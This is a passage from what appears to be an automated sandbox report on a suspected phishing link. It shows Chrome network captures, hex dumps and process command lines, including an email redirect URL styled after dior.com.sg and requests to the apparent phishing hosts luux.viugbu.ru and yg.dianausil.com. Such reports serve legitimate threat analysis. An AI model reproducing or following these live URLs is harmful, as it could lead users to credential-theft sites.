                                                                      2025-03-19 10:30:05 UTC309INData Raw: 99 e5 01 1a ae 24 1a 01 0f 82 94 b8 17 10 11 06 de c4 b1 28 5d f1 0e ee 39 df 2c 85 85 09 69 c6 04 d7 c0 65 d0 03 c2 20 04 ce 80 13 a0 09 1c 01 87 e4 9b b0 01 bd 5f 93 b5 e8 ca 40 13 68 01 2f 84 89 fb c2 c4 2e 16 2f 55 32 4e 64 f5 92 e4 8b e6 07 f8 2e f9 a6 f0 55 f2 05 7c 06 9f c0 7b d0 28 16 da cd ad 79 10 09 81 d7 60 0c 7c 04 e3 dc 02 7a 5c cd 06 7a d9 40 0b 6f 35 18 88 e1 2d 98 94 0b 4f f4 54 c6 54 4c 29 af 35 17 1d ce 79 b1 6d 0d 9d ab 96 0f 81 01 7a 5a e3 94 7f d8 81 b3 c7 bc c5 8b 12 f1 3a 1b b8 42 97 8a 69 0a e5 8e 77 ce 82 d2 eb 3f 21 0c f0 f6 6d 2d 78 69 f5 95 1f a6 e7 3b 9c 9e 0f 65 0c 30 c9 41 cc e1 1c 57 c7 7d bf ef 45 a6 b5 88 75 ff 0a ee e7 c8 cf 68 30 4f ad 2f c5 de df 82 55 df 00 6a 41 1d c4 ea 2c 20 a2 f3 7b 0f 28 fc ff 7f b1 f8 dd cf 5f
                                                                      Data Ascii: $(]9,ie _@h/./U2Nd.U|{(y`|z\z@o5-OTTL)5ymzZ:Biw?!m-xi;e0AW}Euh0O/UjA, {(_


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      32192.168.2.649746104.16.2.1894431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:05 UTC588OUTGET /favicon.png HTTP/1.1
                                                                      Host: developers.cloudflare.com
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Cookie: __cf_bm=baUZHYVlkzDWHdtjPGRPAlXsRMlLkH3dcBB7aW8tGgE-1742380205-1.0.1.1-fKLznBsqT02FLvhayWl8hMdyCQhnycF19IVsdlB2oUdYbQLZAYtPUlzii7wOZw2yBIshojXraHd9oT7rsxAq1lNjFSs.hHsFwEx2eZcsn4A
                                                                      2025-03-19 10:30:06 UTC435INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:30:06 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 937
                                                                      Connection: close
                                                                      CF-Cache-Status: HIT
                                                                      Cache-Control: public, max-age=0, must-revalidate
                                                                      ETag: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                                                                      Strict-Transport-Security: max-age=15552000; preload
                                                                      X-Content-Type-Options: nosniff
                                                                      access-control-allow-origin: *
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4adedb712c47-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:30:06 UTC934INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a
                                                                      Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6
                                                                      2025-03-19 10:30:06 UTC3INData Raw: 42 60 82
                                                                      Data Ascii: B`


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      33192.168.2.649747172.67.148.1004431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:15 UTC566OUTGET /jawari@iczbbjab HTTP/1.1
                                                                      Host: luux.viugbu.ru
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Origin: https://yg.dianausil.com
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Referer: https://yg.dianausil.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:30:16 UTC822INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:30:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Access-Control-Allow-Origin: *
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B1FblBQmNAg2Pw2Njt3%2BMml0QtUAZBITeLSHywx3WZTW%2F6yYVAQZJ4kZd83dAZT81EufvHqcKd0LXgmJCeQIEfAybnvVnlmIm2krf36qZLW3qF3lcVyHGON0BV%2Bz34KiPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4b1bec23dbaf-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=937&min_rtt=579&rtt_var=473&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1138&delivery_rate=5001727&cwnd=251&unsent_bytes=0&cid=4967d4182b05c930&ts=727&x=0"
                                                                      2025-03-19 10:30:16 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                      Data Ascii: 11
                                                                      2025-03-19 10:30:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      34192.168.2.655744172.67.148.1004431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:16 UTC393OUTGET /jawari@iczbbjab HTTP/1.1
                                                                      Host: luux.viugbu.ru
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: empty
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:30:17 UTC815INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:30:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Access-Control-Allow-Origin: *
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GefCIgm8MYq6JT%2FE1EhPYFmpMK9iET2lj4q9i4FYtUdVmL29hClzFBOkNJ4Rd9imXeULL5Pslw1Nl4JmM3dtoj5ReujS5bagWAtLHq5OTJxsYHQsJxCaB4xsroBrl0SApg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4b21caeedba1-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=548&min_rtt=544&rtt_var=213&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=965&delivery_rate=4984509&cwnd=249&unsent_bytes=0&cid=3d4d7bd3e8be7227&ts=824&x=0"
                                                                      2025-03-19 10:30:17 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                      Data Ascii: 11
                                                                      2025-03-19 10:30:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      020406080s020406080100

                                                                      Click to jump to process

                                                                      020406080s0.0050100MB

                                                                      Click to jump to process

                                                                      Target ID:4
                                                                      Start time:06:29:42
                                                                      Start date:19/03/2025
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                      Imagebase:0x7ff63b000000
                                                                      File size:3'388'000 bytes
                                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:6
                                                                      Start time:06:29:46
                                                                      Start date:19/03/2025
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1940,i,9831878234390128474,8964339834726454301,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:3
                                                                      Imagebase:0x7ff63b000000
                                                                      File size:3'388'000 bytes
                                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Target ID:8
                                                                      Start time:06:29:53
                                                                      Start date:19/03/2025
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&"
                                                                      Imagebase:0x7ff63b000000
                                                                      File size:3'388'000 bytes
                                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      No disassembly